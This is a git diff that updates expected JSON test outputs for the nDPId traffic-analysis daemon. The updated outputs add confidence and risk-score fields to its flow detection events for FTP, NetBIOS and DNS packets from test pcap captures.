 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1574361625878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1574361625878,"pkt":"ZABqYzXM9LUv\/K\/wht1gC1mOACgGOioACAAQEAAAAAAAAAAAAAEqAA1AAAEAAwGSABIBkwARABWutHAVBmyZN0G2oBL\/\/zbpAAACBAWgBAIIClbTSMOWBV6iAQMDDg=="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1574361625878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1574361625878,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACAGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbZwFQZtgBAA4XzDAAABAQgKlgVesFbTSMM="}
-00720{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1574361625864,"flow_last_seen":1574361633102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":7,"midstream":0,"ts_msec":1574361633102,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"hello","password":"","auth_failed":1}}
+00837{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1574361625864,"flow_last_seen":1574361633102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":7,"midstream":0,"ts_msec":1574361633102,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"hello","password":"","auth_failed":1}}
 00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1574361625864,"flow_last_seen":1574361633102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":7,"midstream":0,"ts_msec":1574361633102,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597399 bytes
-~~ total memory freed........: 4597399 bytes
-~~ total allocations/frees...: 99572/99572
+~~ total memory allocated....: 4682352 bytes
+~~ total memory freed........: 4682352 bytes
+~~ total allocations/frees...: 101162/101162
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
-~~ json string max len.......: 725 chars
-~~ json string avg len.......: 504 chars
+~~ json string max len.......: 842 chars
+~~ json string avg len.......: 555 chars
diff --git a/test/results/fuzz-2006-06-26-2594.pcap.out b/test/results/fuzz-2006-06-26-2594.pcap.out
index 16a5296f7..6576c3d35 100644
--- a/test/results/fuzz-2006-06-26-2594.pcap.out
+++ b/test/results/fuzz-2006-06-26-2594.pcap.out
@@ -1,70 +1,70 @@
 00452{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469540839,"flow_last_seen":1120469540839,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469540839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1120469540839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120469540839,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaYwAAIARTMHAqAECwKgB\/wCJAIkAOlu0hOcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPU0FDQUNBQ0FDQUJNAAAgAAE="}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469540839,"flow_last_seen":1120469540839,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469540839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469540839,"flow_last_seen":1120469540839,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469540839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1120469541585,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120469541585,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaYkAAIARTMDAqAECwKgB\/wCJAIkAOlu0hOcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAA2AAE="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469542336,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1120469542336,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120469542336,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaY4AAIARA7\/ZqAECwKgB\/wCJAIkAOlu0hOcBEAABaQAAAAAAIEVGRURFSkZQRUVFUEVORUIFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469551656,"flow_last_seen":1120469551656,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469551656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1120469551656,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120469551656,"pkt":"ADBUMjQlcwDtAW69CABFAAA+aY8AAIARTczAqAECwKgBAQqYADUAKiNDstABAAABAAAAAADPA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
-00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469551656,"flow_last_seen":1120469551656,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469551656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469551656,"flow_last_seen":1120469551656,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469551656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469552651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1120469552651,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120469552651,"pkt":"ADBUADRWAODtAW69CABFAAA+aZAAAIARTcvAqAECwCVzAAqYADUCKiNDstABAAABAAAAAAAAA3NpcAljeWJlcmNydHkCZGsAAAEAAQ=="}
-00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469552651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercrty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469552651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercrty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554654,"flow_last_seen":1120469554654,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469554654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":49973,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1120469554654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120469554654,"pkt":"ADBUADRWAODtAW51CABFAAA+aZEAAIARlcrAqAECwKgBAQqYwzUAKiNDstABAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":180000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1120469554824,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1120469554824,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":144,"pkt_l4_len":110,"ts_msec":1120469554824,"pkt":"AODtAW69ADBUADRWCABFAACCAABAAEARtxfAqAEDwKgBAgA1CpgAbjxwstCBgAABAAEAAgABA3NpcAljeWJlcmNpdHkCZGsAAAEAAcAMAAEAAQBAASwABNTyISPAEAACAAEAAACJAAYDbnMywBDAEAACAAEAAACJAAYDbnMxwBDAUAABAAEAAACJAATU8in4"}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":180000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1120469554824,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":4,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":180000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1120469554824,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":4,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469555830,"flow_last_seen":1120469555830,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469555830,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1120469555830,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469555830,"pkt":"ADBUADRWAODtAW69CABFAABIaZIAAIARTb\/AqAECwKgBAQqZADUANN1ZTNIBAAABAAAAACWHAF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469555830,"flow_last_seen":1120469555830,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469555830,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":24435,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469555830,"flow_last_seen":1120469555830,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469555830,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":24435,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469556827,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1120469556827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469556827,"pkt":"ADBUADRWAODtAW69CABFAABIaZMAAIARTb7AqAFuwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5JXMAJXMAAAE="}
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469556827,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469556827,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":12,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":27904,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120469558830,"pkt":"ADBUADRWAODtAW69bQBFAABIaZQAAIARTb3QqAECwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAMX3VkcINzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":12,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":27904}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469560833,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1120469560833,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469560833,"pkt":"ADBUADRWAODtAW69CABFAABIaZUAAIARTbzAqAECwKgBAQolcwAANN9ZTE4BAAABACVzAAAABF9zaXAEX1VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1120469564839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469564839,"pkt":"ADBUADRWAODtAW69CABFAABIaZYAAIARTbvAqAECwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469555830,"flow_last_seen":1120469564839,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469564839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
